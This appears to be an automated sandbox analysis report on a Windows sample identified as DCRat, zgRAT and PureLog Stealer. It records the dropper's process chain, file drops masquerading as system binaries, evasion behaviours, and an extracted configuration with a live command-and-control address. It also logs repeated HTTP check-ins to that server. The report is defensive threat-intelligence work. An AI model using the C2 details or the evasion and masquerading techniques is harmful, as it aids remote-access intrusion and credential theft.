Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
voed9G7p5s.exe

Overview

General Information

Sample name:voed9G7p5s.exe
renamed because original name is a hash value
Original sample name:0e22e05075402fd6fc2f0a833d49c288.exe
Analysis ID:1582936
MD5:0e22e05075402fd6fc2f0a833d49c288
SHA1:eb40fec691901a96a77df716902f04ddc3debf24
SHA256:e232d303d7c90ed82cc677f170e466159d2ffbf3aad45a225cc545e9efb8cf07
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • voed9G7p5s.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\voed9G7p5s.exe" MD5: 0E22E05075402FD6FC2F0A833D49C288)
    • wscript.exe (PID: 6772 cmdline: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7088 cmdline: C:\Windows\system32\cmd.exe /c ""C:\savesSession\4pVzEVKfbvkCEJ9qYser3z0xImhTTPHqTDWOugPvvPYsbZ7.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ComponentBrokermonitor.exe (PID: 3492 cmdline: "C:\savesSession/ComponentBrokermonitor.exe" MD5: 43D19D8B3DF29BDFB6AB0D58C3E64424)
          • cmd.exe (PID: 5960 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3452 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 3228 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • RuntimeBroker.exe (PID: 6340 cmdline: "C:\Recovery\RuntimeBroker.exe" MD5: 43D19D8B3DF29BDFB6AB0D58C3E64424)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\savesSession\ComponentBrokermonitor.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\savesSession\ComponentBrokermonitor.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Users\Default\Videos\OfficeClickToRun.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\Default\Videos\OfficeClickToRun.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files (x86)\jDownloader\config\dllhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 7 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000003.1646097008.0000000006A4E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000009.00000002.2887155289.0000000003131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000004.00000000.1733341807.0000000000982000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  00000009.00000002.2887155289.0000000003350000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Click to see the 2 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      4.0.ComponentBrokermonitor.exe.980000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        4.0.ComponentBrokermonitor.exe.980000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Files With System Process Name In Unsuspected Locations
                          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\savesSession\ComponentBrokermonitor.exe, ProcessId: 3492, TargetFilename: C:\Program Files (x86)\jdownloader\config\dllhost.exe
                          Sigma detected: System File Execution Location Anomaly
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Recovery\RuntimeBroker.exe" , CommandLine: "C:\Recovery\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Recovery\RuntimeBroker.exe, NewProcessName: C:\Recovery\RuntimeBroker.exe, OriginalFileName: C:\Recovery\RuntimeBroker.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5960, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Recovery\RuntimeBroker.exe" , ProcessId: 6340, ProcessName: RuntimeBroker.exe
                          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\voed9G7p5s.exe", ParentImage: C:\Users\user\Desktop\voed9G7p5s.exe, ParentProcessId: 6588, ParentProcessName: voed9G7p5s.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbe" , ProcessId: 6772, ProcessName: wscript.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-01T02:27:13.424963+010020480951A Network Trojan was detected192.168.2.449732185.239.51.5680TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus detection for URL or domain
                          Source: http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral.phpAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\MqhNXtrC.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\savesSession\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\jDownloader\config\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\HCaVYTBq.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\savesSession\Ay6OSRVd54M0URboub1xHjGCi4U1zMZmQyA39xBzO7chiTURiJbZUgQ.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                          Source: C:\Users\Default\Videos\OfficeClickToRun.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Users\user\Desktop\gNqaUEQu.logAvira: detection malicious, Label: TR/Agent.jbwuj
                          Source: C:\Users\user\AppData\Local\Temp\uT6K3ltlhZ.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\jpaRTMbF.logAvira: detection malicious, Label: TR/Agent.jbwuj
                          Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                          Found malware configuration
                          Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://185.239.51.56/externalVmpacketlongpollSqldbFloweruniversalCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeReversingLabs: Detection: 55%
                          Source: C:\Program Files (x86)\jDownloader\config\dllhost.exeReversingLabs: Detection: 55%
                          Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 55%
                          Source: C:\Users\Default\Videos\OfficeClickToRun.exeReversingLabs: Detection: 55%
                          Source: C:\Users\user\Desktop\ERuFRGqx.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\HCaVYTBq.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\HufwPOBJ.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\MqhNXtrC.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\PYnlzHQq.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\eKDszVMz.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\gNqaUEQu.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\jpaRTMbF.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\vomPhMaQ.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\yIzGwiSf.logReversingLabs: Detection: 25%
                          Source: C:\savesSession\ComponentBrokermonitor.exeReversingLabs: Detection: 55%
                          Source: C:\savesSession\winlogon.exeReversingLabs: Detection: 55%
                          Multi AV Scanner detection for submitted file
                          Source: voed9G7p5s.exeVirustotal: Detection: 58%Perma Link
                          Source: voed9G7p5s.exeReversingLabs: Detection: 71%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                          Machine Learning detection for dropped file
                          Source: C:\savesSession\ComponentBrokermonitor.exeJoe Sandbox ML: detected
                          Source: C:\savesSession\winlogon.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\jDownloader\config\dllhost.exeJoe Sandbox ML: detected
                          Source: C:\Users\Default\Videos\OfficeClickToRun.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\JfKMXbLC.logJoe Sandbox ML: detected
                          Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\MSECache\OfficeKMS\FNDmTgDttMjJpiTujJnAGafC.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\yZRgoalJ.logJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: voed9G7p5s.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["d8uhEIfQa2Fp48ca8Uml58o22vAtJG5vOW541mJMUeNna5wJvoT0cKXfT2pTIvHU6UbhDhiVLaRbvBc6907fxESE8ak960EiW2qFeOGNF7pC26tSZtURxmh1CXjn6jYV","554f049d678a045e30ca1c0b02f850d36d0223cd7b5055b518f68280165f163e","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]
                          Source: 00000004.00000002.1770434418.0000000012E51000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://185.239.51.56/","externalVmpacketlongpollSqldbFloweruniversalCentral"]]
                          Source: voed9G7p5s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: voed9G7p5s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: voed9G7p5s.exe
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E0A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00E0A69B
                          Source: C:\Users\user\Desktop\voed9G7p5s.exeCode function: 0_2_00E1C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00E1C220
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4x nop then jmp 00007FFD9BAD1576h4_2_00007FFD9BAC086A
                          Source: C:\savesSession\ComponentBrokermonitor.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh4_2_00007FFD9BC6A5DD
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 4x nop then jmp 00007FFD9BAE1576h9_2_00007FFD9BAD086A
                          Source: C:\Recovery\RuntimeBroker.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh9_2_00007FFD9BC7A5DD

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 185.239.51.56:80
                          Source: Joe Sandbox ViewASN Name: MGNHOST-ASRU MGNHOST-ASRU
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: multipart/form-data; boundary=----4k4tMK3G3KPi7KkCKThjRxh2CLpKVewxphUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 112350Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2500Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 1600Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 185.239.51.56Content-Length: 2504Expect: 100-continueConnection: Keep-Alive
